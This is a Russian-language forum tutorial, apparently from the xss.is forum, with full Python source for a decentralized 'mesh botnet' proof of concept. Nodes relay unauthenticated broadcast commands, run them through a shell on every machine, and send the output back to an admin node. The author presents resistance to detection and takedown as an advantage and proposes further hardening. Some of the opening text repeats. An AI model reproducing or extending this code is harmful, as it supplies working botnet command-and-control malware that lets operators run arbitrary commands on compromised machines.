D2
Администратор
- Регистрация
- 19 Фев 2025
- Сообщения
- 4,380
- Реакции
- 0
Привет, форумчане!
Сегодня я расскажу вам, как замутить свою собственную Mesh сеть для контроля машин - прямую такую штуку с PoC кодом, чтобы вы могли сами покрутить и понять, как это работает.
Это обучающая статья для форума xss.is - всё поэтапно, с теорией, объяснением, почему мы делаем так, а не иначе.
В статье мы пишем PoC, так что всё максимально просто, но рабочая база у вас будет.
Bash: Скопировать в буфер обмена
Я с вами разобрал Mesh сеть от А до Я - от теории до каждого метода. Полный код ниже, крутите, тестите.
Что добавить? Шифрование, маршрутизацию, устойчивость к сбоям, подпись команд для администратора сети, и многое другое.
Удачи в экспериментах! Вопросы есть - пишите, разберёмся.
Материал предоставлен исключительно в ознакомительных и образовательных целях. Автор не несёт ответственности за использование информации в нарушение законов вашей страны. Все действия с кодом вы выполняете на свой страх и риск - думайте головой и уважайте правила
Автор keklick1337
Специально для xss.is
Спойлер: Полный код
Python: Скопировать в буфер обмена
Сегодня я расскажу вам, как замутить свою собственную Mesh сеть для контроля машин - прямую такую штуку с PoC кодом, чтобы вы могли сами покрутить и понять, как это работает.
Это обучающая статья для форума xss.is - всё поэтапно, с теорией, объяснением, почему мы делаем так, а не иначе.
Введение в Mesh сети - что это вообще такое?
Для начала давайте разберёмся, что такое Mesh сеть. В обычных сетях - типа клиент-сервер - есть главный узел (сервер), который рулит всеми клиентами. Если его вырубить, вся схема разваливается. Mesh сеть - это другой уровень: тут все узлы равноправны, как в коммуне. Каждый может общаться с каждым напрямую или через соседей - получается такая паутина, где каждый узел и клиент, и сервер одновременно.Почему Mesh сети - это тема?
- Отказоустойчивость - если одна нода отвалилась, сеть не падает, сообщения идут через другие узлы.
- Сложность обнаружения - нет центральной точки, которую можно легко вычислить и прихлопнуть.
- Масштабируемость - добавляйте сколько угодно узлов, сеть сама разберётся.
В статье мы пишем PoC, так что всё максимально просто, но рабочая база у вас будет.
Теория - как это работает?
Наша Mesh сеть - это набор узлов (нод), которые:- Слушают входящие подключения.
- Коннектятся к другим узлам.
- Пересылают сообщения (команды, ответы) по сети.
Ключевые элементы:
- Узел (MeshNode) - знает свой хост и порт, имеет список начальных пиров, к которым цепляется при старте.
- Сообщения - JSON с полями: id (уникальный идентификатор), type (тип: handshake, command, response), sender (отправитель), target (получатель, если есть), path (маршрут), content (содержимое).
- Handshake - при подключении ноды обмениваются инфой: "Привет, я такой-то, мой порт вот этот".
- Команды и ответы - админская нода шлёт команды (например, "hostname"), они расходятся по сети, узлы выполняют и возвращают результат.
Как сообщения ходят?
- Нода получает сообщение - проверяет его id. Если уже видела, дропает.
- Если новое - обрабатывает (например, выполняет команду) и шлёт всем своим пирам, кроме отправителя.
- Получается волновой эффект - сообщение разлетается по всей сети.
Как избежать зацикливания?
- У каждой ноды есть message_history - хранит id уже обработанных сообщений.
- Плюс forwarded_messages - чтобы не пересылать одно и то же по кругу.
Пишем код
Теперь давайте замутим код. Я разберу каждый метод класса MeshNode - зачем он нужен, как работает, почему написан именно так. Начнём с базовых функций для отправки и получения сообщений, а потом перейдём к самому классу.Базовые функции для общения
encode_message(message)
- Зачем нужен: Подготавливает сообщение перед отправкой - добавляет поле size (размер данных в байтах) и сериализует в JSON.
- Как пишется:
Python: Скопировать в буфер обмена
Код:def encode_message(message): temp = message.copy() if "size" in temp: del temp["size"] message_str = json.dumps(temp) size = len(message_str.encode('utf-8')) message["size"] = size return json.dumps(message).encode('utf-8')
- Почему так:
- Делаем копию словаря message, чтобы не портить оригинал.
- Удаляем size, если оно есть - оно нам не нужно для вычисления размера, добавим потом.
- Сериализуем в строку через json.dumps(), считаем байты через encode('utf-8').
- Добавляем size в оригинальный словарь и сериализуем ещё раз - теперь это готовые байты для отправки.
- Детали: Это нужно, чтобы получатель знал, сколько байт читать. Без size он бы просто гадал, где конец сообщения.
send_message(sock, message)
- Зачем нужен: Отправляет сообщение через сокет - сначала 4 байта длины, потом само сообщение.
- Как пишется:
Python: Скопировать в буфер обмена
Код:def send_message(sock, message): try: data = encode_message(message) length_prefix = struct.pack('!I', len(data)) sock.sendall(length_prefix + data) except Exception as e: logging.error("send_message:: Error: %s", e)
- Почему так:
- encode_message() даёт нам байты сообщения.
- struct.pack('!I', len(data)) упаковывает длину в 4 байта (unsigned int, big-endian - ! для сетевого порядка).
- sendall() гарантирует, что все байты уйдут, даже если сеть тормозит.
- Оборачиваем в try-except - если сокет отвалился, логируем ошибку и не падаем.
- Детали: Префикс длины - стандартный способ в сетевом программировании. Без него получатель не поймёт, где начало и конец.
recvall(sock, n)
- Зачем нужен: Читает ровно n байт из сокета - нужно для получения и длины, и самого сообщения.
- Как пишется:
Python: Скопировать в буфер обмена
Код:def recvall(sock, n): data = b'' while len(data) < n: try: packet = sock.recv(n - len(data)) except Exception as e: logging.error("recvall:: Error read from socket: %s", e) return None if not packet: return None data += packet return data
- Почему так:
- sock.recv() может вернуть меньше байт, чем запрошено, - сеть же не резиновая.
- Цикл while читает, пока не наберём нужное количество.
- Если соединение рвётся (packet пустой) или ошибка - возвращаем None.
- Детали: Без этого метода мы бы теряли куски данных - recv() не гарантирует полный объём за один вызов.
recv_message(sock)
- Зачем нужен: Читает полное сообщение - сначала длину, потом данные, и декодирует из JSON.
- Как пишется:
Python: Скопировать в буфер обмена
Код:def recv_message(sock): raw_length = recvall(sock, 4) if not raw_length: return None length = struct.unpack('!I', raw_length)[0] data = recvall(sock, length) if not data: return None try: message_str = data.decode('utf-8') message = json.loads(message_str) return message except Exception as e: logging.error("recv_message:: Error decoding message: %s", e) return None
- Почему так:
- Сначала читаем 4 байта длины через recvall() - это наш префикс.
- Распаковываем через struct.unpack('!I') - получаем число.
- Читаем ровно length байт - это само сообщение.
- Декодируем из байтов в строку (utf-8), парсим JSON - готово.
- Если что-то пошло не так (сокет отвалился, JSON кривой) - возвращаем None.
- Детали: Это обратная сторона send_message() - читаем в том же формате, как отправили.
Класс MeshNode - сердце сети
Теперь к главному, класс MeshNode. Это основа нашей сети. Разберём каждый его метод до винтиков.init(self, host, port, is_admin, initial_peers)
- Зачем нужен: Инициализирует ноду - задаёт базовые параметры и структуры данных.
- Как пишется:
Python: Скопировать в буфер обмена
Код:def __init__(self, host, port, is_admin, initial_peers): self.host = host self.port = port self.is_admin = is_admin self.node_id = f"{host}:{port}" self.initial_peers = initial_peers self.peers = [] self.peers_lock = threading.Lock() self.message_history = set() self.forwarded_messages = set() self.running = True
- Почему так:
- host и port - где нода слушает входящие соединения.
- is_admin - флаг, админская нода или нет (админ шлёт команды).
- node_id - простое строковое ID из хоста и порта, для PoC хватает.
- initial_peers - список строк "host
ort" для начальных подключений.
- peers - список активных сокетов, через которые общаемся.
- peers_lock - лок для потокобезопасности, чтобы не было гонок при добавлении/удалении пиров.
- message_history и forwarded_messages - множества для фильтрации дубликатов сообщений.
- running - флаг для graceful завершения.
- Детали: Всё минималистично - для PoC не нужны сложные структуры, но основа для масштабирования есть.
start(self)
- Зачем нужен: Запускает ноду - сервер, подключения к пирам, админский цикл (если надо).
- Как пишется:
Python: Скопировать в буфер обмена
Код:def start(self): server_thread = threading.Thread(target=self.server_loop) server_thread.daemon = True server_thread.start() logging.info("start:: Server on %s:%s", self.host, self.port) for peer in self.initial_peers: try: peer_host, peer_port = peer.split(":") peer_port = int(peer_port) t = threading.Thread(target=self.connect_to_peer, args=(peer_host, peer_port)) t.daemon = True t.start() except Exception as e: logging.error("start:: Unknown peer format %s: %s", peer, e) if self.is_admin: admin_thread = threading.Thread(target=self.admin_send_commands) admin_thread.daemon = True admin_thread.start() try: while self.running: time.sleep(1) except KeyboardInterrupt: logging.info("start:: Stop") self.running = False sys.exit(0)
- Почему так:
- Запускаем сервер в потоке через server_loop() - он будет ловить входящие соединения.
- daemon = True - чтобы потоки гасились при закрытии программы.
- Проходим по initial_peers, парсим "host
ort", запускаем подключение в потоке.
- Если нода админская - стартуем цикл отправки команд.
- Основной цикл while - просто держит программу живой, пока не нажмём Ctrl+C.
- При прерывании ставим running = False и выходим чисто.
- Детали: Это точка входа - отсюда нода оживает и начинает строить сеть.
server_loop(self)
- Зачем нужен: Слушает входящие подключения - это серверная часть ноды.
- Как пишется:
Python: Скопировать в буфер обмена
Код:def server_loop(self): server_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM) try: server_socket.bind((self.host, self.port)) server_socket.listen(5) except Exception as e: logging.error("server_loop:: Error on socket bind: %s", e) sys.exit(1) while self.running: try: conn, addr = server_socket.accept() logging.info("server_loop:: recv conn from %s", addr) handshake_msg = { "id": str(uuid.uuid4()), "type": "handshake", "content": {"port": self.port, "node_id": self.node_id}, "sender": self.node_id, "target": "", "path": [self.node_id] } send_message(conn, handshake_msg) with self.peers_lock: self.peers.append(conn) t = threading.Thread(target=self.handle_connection, args=(conn, addr)) t.daemon = True t.start() except Exception as e: logging.error("server_loop:: Error recv conn: %s", e)
- Почему так:
- Создаём TCP сокет - AF_INET для IPv4, SOCK_STREAM для надёжного соединения.
- bind() и listen(5) - привязываем к хосту и порту, очередь на 5 подключений.
- Если бинд не удался (порт занят, например) - падаем с ошибкой.
- В цикле accept() ловит входящие соединения - возвращает сокет conn и адрес клиента.
- Сразу шлём handshake_msg - представляемся новому пиру.
- Добавляем conn в peers (с локером!) и запускаем обработку в потоке.
- Детали: Это делает ноду доступной для других - без этого она бы только коннектилась, но не принимала.
connect_to_peer(self, peer_host, peer_port)
- Зачем нужен: Устанавливает исходящее соединение к другому узлу.
- Как пишется:
Python: Скопировать в буфер обмена
Код:def connect_to_peer(self, peer_host, peer_port): try: sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock.connect((peer_host, peer_port)) logging.info("connect_to_peer:: with %s:%s", peer_host, peer_port) handshake_msg = { "id": str(uuid.uuid4()), "type": "handshake", "content": {"port": self.port, "node_id": self.node_id}, "sender": self.node_id, "target": "", "path": [self.node_id] } send_message(sock, handshake_msg) with self.peers_lock: self.peers.append(sock) t = threading.Thread(target=self.handle_connection, args=(sock, (peer_host, peer_port))) t.daemon = True t.start() except Exception as e: logging.error("connect_to_peer:: err conn to peer %s:%s - %s", peer_host, peer_port, e)
- Почему так:
- Создаём сокет и коннектимся к peer_host
eer_port.
- Если всё ок - шлём handshake_msg, чтобы пир знал, кто мы.
- Добавляем сокет в peers и запускаем обработку в потоке.
- Если пир не отвечает - логируем ошибку и идём дальше.
- Создаём сокет и коннектимся к peer_host
- Детали: Это исходящая часть - без неё нода не сможет строить сеть активно.
handle_connection(self, conn, addr)
- Зачем нужен: Обрабатывает конкретное соединение - читает сообщения, пока пир жив.
- Как пишется:
Python: Скопировать в буфер обмена
Код:def handle_connection(self, conn, addr): while self.running: message = recv_message(conn) if message is None: logging.info("handle_connection:: connection with %s closed", addr) break self.handle_message(message, conn) with self.peers_lock: if conn in self.peers: self.peers.remove(conn) conn.close()
- Почему так:
- В цикле читаем сообщения через recv_message().
- Если None - соединение оборвалось, выходим из цикла.
- Каждое сообщение кидаем в handle_message() для обработки.
- При выходе убираем сокет из peers и закрываем его.
- Детали: Это связующее звено между сокетом и логикой обработки - без него сообщения бы не доходили до ноды.
handle_message(self, message, conn)
- Зачем нужен: Решает, что делать с полученным сообщением - главный мозг ноды.
- Как пишется:
Python: Скопировать в буфер обмена
Код:def handle_message(self, message, conn): msg_id = message.get("id") if msg_id in self.message_history: return self.message_history.add(msg_id) path = message.get("path", []) if self.node_id not in path: path.append(self.node_id) message["path"] = path logging.info("handle_message:: recv msg %s (type: %s, path: %s)", msg_id, message.get("type"), message.get("path")) msg_type = message.get("type") if msg_type == "handshake": content = message.get("content", {}) peer_node_id = content.get("node_id") peer_port = content.get("port") logging.info("handle_message:: Handshake from %s, port: %s", peer_node_id, peer_port) elif msg_type == "command": target = message.get("target", "") if target == "" or target == self.node_id: cmd = message.get("content") logging.info("handle_message:: run cmd '%s'", cmd) t = threading.Thread(target=self.execute_command, args=(cmd, msg_id, message.get("sender"))) t.daemon = True t.start() elif msg_type == "response": logging.info("handle_message:: receive command output %s: %s", message.get("content", {}).get("command_id"), message.get("content", {}).get("result")) if msg_id not in self.forwarded_messages: self.forwarded_messages.add(msg_id) self.forward_message(message, exclude_conn=conn)
- Почему так:
- Проверяем msg_id - если уже видели, дропаем, чтобы не зациклить.
- Добавляем себя в path - для отладки и отслеживания маршрута.
- Смотрим тип сообщения:
- Handshake - логируем инфу о пире.
- Command - если для нас или broadcast (target пустой), запускаем команду в потоке.
- Response - просто логируем результат.
- Если сообщение не пересылали - добавляем в forwarded_messages и шлём дальше.
- Детали: Это ядро логики - тут нода решает, что делать и куда слать.
forward_message(self, message, exclude_conn=None)
- Зачем нужен: Пересылает сообщение всем пирам, кроме отправителя.
- Как пишется:
Код: Скопировать в буфер обмена
Код:def forward_message(self, message, exclude_conn=None): with self.peers_lock: for peer in list(self.peers): if peer == exclude_conn: continue try: send_message(peer, message) logging.info("forward_message:: forward msg %s", message.get("id")) except Exception as e: logging.error("forward_message:: err forward: %s", e) self.peers.remove(peer) peer.close()
- Почему так:
- Лочим peers, чтобы не было гонок.
- Проходим по копии списка (list(self.peers)), шлём всем, кроме exclude_conn.
- Если отправка фейлится - убираем пир и закрываем сокет.
- Детали: Это делает сеть "живой" - без пересылки сообщения бы не расходились.
execute_command(self, cmd, original_msg_id, original_sender)
- Зачем нужен: Выполняет команду и отправляет ответ.
- Как пишется:
Код: Скопировать в буфер обмена
Код:def execute_command(self, cmd, original_msg_id, original_sender): logging.info("execute_command:: run '%s'", cmd) cmd_timeout = 5 try: result = subprocess.run(cmd, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, timeout=cmd_timeout) if result.stdout: output = result.stdout.decode('utf-8').strip() else: output = result.stderr.decode('utf-8').strip() except subprocess.TimeoutExpired: output = f"cmd timeout ({cmd_timeout})" except Exception as e: output = f"err cmd execute: {e}" response_msg = { "id": str(uuid.uuid4()), "type": "response", "content": {"command_id": original_msg_id, "result": output}, "sender": self.node_id, "target": original_sender, "path": [self.node_id] } self.forward_message(response_msg) logging.info("execute_command:: send cmd response %s", original_msg_id)
- Почему так:
- Выполняем команду через subprocess.run() с таймаутом 5 сек.
- Берём вывод - stdout или stderr, если что-то пошло не так.
- Формируем ответ с привязкой к original_msg_id и шлём отправителю.
- Детали: Это делает ноду "полезной" - без выполнения команд это был бы просто чат.
admin_send_commands(self)
- Зачем нужен: Админская нода периодически шлёт команды всем.
- Как пишется:
Python: Скопировать в буфер обмена
Код:def admin_send_commands(self): while self.running: time.sleep(15) command_msg = { "id": str(uuid.uuid4()), "type": "command", "content": "hostname", "sender": self.node_id, "target": "", "path": [self.node_id] } logging.info("admin_send_commands:: send cmd 'hostname'") self.forward_message(command_msg)
- Почему так:
- Каждые 15 сек шлём "hostname" как broadcast (target пустой).
- Новый id каждый раз - чтобы не фильтровались как дубли.
- Команда hostname используется для теста. Можете использовать другую.
- Детали: Это тестовая фича - показывает, как админ управляет сетью.
Как это работает?
Запуск
- Нода стартует сервер, цепляется к пирам, обменивается handshake.
- Админ (если есть) начинает слать команды.
Распространение
- Команды и ответы ходят волной - от узла к узлу.
- Фильтрация дубликатов спасает от зацикливания.
Пример
Запускаем три ноды:Bash: Скопировать в буфер обмена
Код:
python3 mesh.py --host 192.168.1.10 --port 5000 --admin --peers 192.168.1.11:5000
python3 mesh.py --host 192.168.1.11 --port 5000 --peers 192.168.1.10:5000 192.168.1.12:5000
python3 mesh.py --host 192.168.1.12 --port 5000 --peers 192.168.1.11:5000
- A (админ) шлёт "hostname" → B → C.
- C отвечает → B → A.
Итог
Вот и всё!Я с вами разобрал Mesh сеть от А до Я - от теории до каждого метода. Полный код ниже, крутите, тестите.
Что добавить? Шифрование, маршрутизацию, устойчивость к сбоям, подпись команд для администратора сети, и многое другое.
Удачи в экспериментах! Вопросы есть - пишите, разберёмся.
Материал предоставлен исключительно в ознакомительных и образовательных целях. Автор не несёт ответственности за использование информации в нарушение законов вашей страны. Все действия с кодом вы выполняете на свой страх и риск - думайте головой и уважайте правила
Автор keklick1337
Специально для xss.is
Спойлер: Полный код
Python: Скопировать в буфер обмена
Код:
#!/usr/bin/env python3
import socket
import threading
import argparse
import logging
import json
import uuid
import time
import subprocess
import struct
import sys
def encode_message(message):
"""
Подготавливает сообщение: вычисляет размер (без учета поля size) и добавляет его в сообщение,
затем сериализует в JSON и возвращает байты.
"""
temp = message.copy()
if "size" in temp:
del temp["size"] # size не нужен, его потом посчитаем
message_str = json.dumps(temp)
size = len(message_str.encode('utf-8'))
message["size"] = size
return json.dumps(message).encode('utf-8')
def send_message(sock, message):
"""
Отправляет сообщение по сокету:
сначала 4 байта с длиной, затем JSON-сообщение.
"""
try:
data = encode_message(message)
length_prefix = struct.pack('!I', len(data))
sock.sendall(length_prefix + data)
except Exception as e:
logging.error("send_message:: Error: %s", e)
def recvall(sock, n):
"""
Читает ровно n байт из сокета.
"""
data = b''
while len(data) < n:
try:
packet = sock.recv(n - len(data))
except Exception as e:
logging.error("recvall:: Error read from socket: %s", e)
return None
if not packet:
return None
data += packet
return data
def recv_message(sock):
"""
Читает сообщение: сначала 4 байта с длиной, затем само сообщение.
"""
raw_length = recvall(sock, 4)
if not raw_length:
return None
length = struct.unpack('!I', raw_length)[0]
data = recvall(sock, length)
if not data:
return None
try:
message_str = data.decode('utf-8')
message = json.loads(message_str)
return message
except Exception as e:
logging.error("recv_message:: Error decoding message: %s", e)
return None
class MeshNode: # наш основной класс mesh сети
def __init__(self, host, port, is_admin, initial_peers):
self.host = host
self.port = port
self.is_admin = is_admin
self.node_id = f"{host}:{port}" # id ноды считаю максимально просто для данного PoC
self.initial_peers = initial_peers # список строк вида "host:port"
self.peers = [] # список активных сокетов
self.peers_lock = threading.Lock()
# Наборы для предотвращения дублирования/зацикливания сообщений
# p.s. у них можно TTL какой нибудь выставить потом
self.message_history = set()
self.forwarded_messages = set()
# Чтобы корректно завершить всё и отрубить ноду
self.running = True
def start(self):
# Запускаем сервер для входящих соединений
server_thread = threading.Thread(target=self.server_loop)
server_thread.daemon = True
server_thread.start()
logging.info("start:: Server on %s:%s", self.host, self.port)
# Пытаемся установить исходящие соединения к начальным пирами
for peer in self.initial_peers:
try:
peer_host, peer_port = peer.split(":")
peer_port = int(peer_port)
t = threading.Thread(target=self.connect_to_peer, args=(peer_host, peer_port))
t.daemon = True
t.start()
except Exception as e:
logging.error("start:: Unknown peer format %s: %s", peer, e)
# Если узел является администратором, запускаем периодическую отправку команды
if self.is_admin:
admin_thread = threading.Thread(target=self.admin_send_commands)
admin_thread.daemon = True
admin_thread.start()
# Основной цикл ожидания (можно добавить обработку сигналов для корректного завершения)
try:
while self.running:
time.sleep(1)
except KeyboardInterrupt:
logging.info("start:: Stop")
self.running = False
sys.exit(0)
def server_loop(self):
server_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
server_socket.bind((self.host, self.port))
server_socket.listen(5)
except Exception as e:
logging.error("server_loop:: Error on socket bind: %s", e)
sys.exit(1)
while self.running:
try:
conn, addr = server_socket.accept()
logging.info("server_loop:: recv conn from %s", addr)
# При установке входящего соединения сразу отправляем handshake с информацией о порте и node_id
handshake_msg = {
"id": str(uuid.uuid4()),
"type": "handshake",
"content": {"port": self.port, "node_id": self.node_id},
"sender": self.node_id,
"target": "",
"path": [self.node_id]
}
send_message(conn, handshake_msg)
with self.peers_lock:
self.peers.append(conn)
t = threading.Thread(target=self.handle_connection, args=(conn, addr))
t.daemon = True
t.start()
except Exception as e:
logging.error("server_loop:: Error recv conn: %s", e)
def connect_to_peer(self, peer_host, peer_port):
try:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((peer_host, peer_port))
logging.info("connect_to_peer:: with %s:%s", peer_host, peer_port)
# После подключения отправляем handshake с информацией о себе
handshake_msg = {
"id": str(uuid.uuid4()),
"type": "handshake",
"content": {"port": self.port, "node_id": self.node_id},
"sender": self.node_id,
"target": "",
"path": [self.node_id]
}
send_message(sock, handshake_msg)
with self.peers_lock:
self.peers.append(sock)
# Запускаем цикл чтения сообщений из этого соединения
t = threading.Thread(target=self.handle_connection, args=(sock, (peer_host, peer_port)))
t.daemon = True
t.start()
except Exception as e:
logging.error("connect_to_peer:: err conn to peer %s:%s - %s", peer_host, peer_port, e)
def handle_connection(self, conn, addr):
while self.running:
message = recv_message(conn)
if message is None:
logging.info("handle_connection:: connection with %s closed", addr)
break
self.handle_message(message, conn)
with self.peers_lock:
if conn in self.peers:
self.peers.remove(conn)
conn.close()
def handle_message(self, message, conn):
msg_id = message.get("id")
# Если сообщение уже было получено, игнорируем его
if msg_id in self.message_history:
return
self.message_history.add(msg_id)
# Обновляем поле path: добавляем свой ID, если его там нет
path = message.get("path", [])
if self.node_id not in path:
path.append(self.node_id)
message["path"] = path
logging.info("handle_message:: recv msg %s (type: %s, path: %s)", msg_id, message.get("type"), message.get("path"))
msg_type = message.get("type")
if msg_type == "handshake":
# Можно обработать информацию о пире (например, добавить новый адрес для установления обратного соединения)
content = message.get("content", {})
peer_node_id = content.get("node_id")
peer_port = content.get("port")
logging.info("handle_message:: Handshake from %s, port: %s", peer_node_id, peer_port)
# Здесь можно реализовать динамическое добавление новых пирoв, если их ещё нет в списке
elif msg_type == "command":
# Если команда адресована узлу (или это broadcast)
target = message.get("target", "")
if target == "" or target == self.node_id:
cmd = message.get("content")
logging.info("handle_message:: run cmd '%s'", cmd)
t = threading.Thread(target=self.execute_command, args=(cmd, msg_id, message.get("sender")))
t.daemon = True
t.start()
elif msg_type == "response":
# Логирование полученного ответа; можно добавить фильтрацию по target
logging.info("handle_message:: receive command output %s: %s", message.get("content", {}).get("command_id"), message.get("content", {}).get("result"))
# Пересылаем сообщение дальше, если ранее не пересылали
if msg_id not in self.forwarded_messages:
self.forwarded_messages.add(msg_id)
self.forward_message(message, exclude_conn=conn)
def forward_message(self, message, exclude_conn=None):
with self.peers_lock:
for peer in list(self.peers):
# Если соединение совпадает с тем, откуда получили сообщение – пропускаем (чтобы не отправлять обратно)
if peer == exclude_conn:
continue
try:
send_message(peer, message)
logging.info("forward_message:: formward msg %s", message.get("id"))
except Exception as e:
logging.error("forward_message:: err forward: %s", e)
self.peers.remove(peer)
peer.close()
def execute_command(self, cmd, original_msg_id, original_sender):
logging.info("execute_command:: run '%s'", cmd)
cmd_tiemout = 5
try:
result = subprocess.run(cmd, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, timeout=cmd_tiemout)
if result.stdout:
output = result.stdout.decode('utf-8').strip()
else:
output = result.stderr.decode('utf-8').strip()
except subprocess.TimeoutExpired:
output = f"cmd timeout ({cmd_tiemout})"
except Exception as e:
output = f"err cmd execute: {e}"
# Формируем сообщение-ответ
response_msg = {
"id": str(uuid.uuid4()),
"type": "response",
"content": {"command_id": original_msg_id, "result": output},
"sender": self.node_id,
"target": original_sender, # адресуем отправителю исходной команды
"path": [self.node_id]
}
# Отправляем ответ (пересылаем его по сети)
self.forward_message(response_msg)
logging.info("execute_command:: send cmd response %s", original_msg_id)
def admin_send_commands(self):
"""
Если узел является администратором, каждые 15 секунд отправляется команда "hostname".
"""
while self.running:
time.sleep(15)
command_msg = {
"id": str(uuid.uuid4()),
"type": "command",
"content": "hostname",
"sender": self.node_id,
"target": "", # пустое target означает broadcast, то есть шлём всем
"path": [self.node_id]
}
logging.info("admin_send_commands:: send cmd 'hostname'")
self.forward_message(command_msg)
def parse_arguments():
parser = argparse.ArgumentParser(description="Simple mesh botnet PoC")
parser.add_argument("--host", required=True, help="listen host")
parser.add_argument("--port", type=int, required=True, help="listen port")
parser.add_argument("--admin", action="store_true", help="set admin mode (send's hostname cmd)")
parser.add_argument("--peers", nargs='*', default=[], help="start peers to connect host:port")
return parser.parse_args()
def main():
args = parse_arguments()
# Настройка логирования с выводом времени
logging.basicConfig(
level=logging.INFO,
format="%(asctime)s [%(levelname)s] %(message)s",
datefmt="%H:%M:%S"
)
node = MeshNode(args.host, args.port, args.admin, args.peers)
node.start()
if __name__ == "__main__":
main()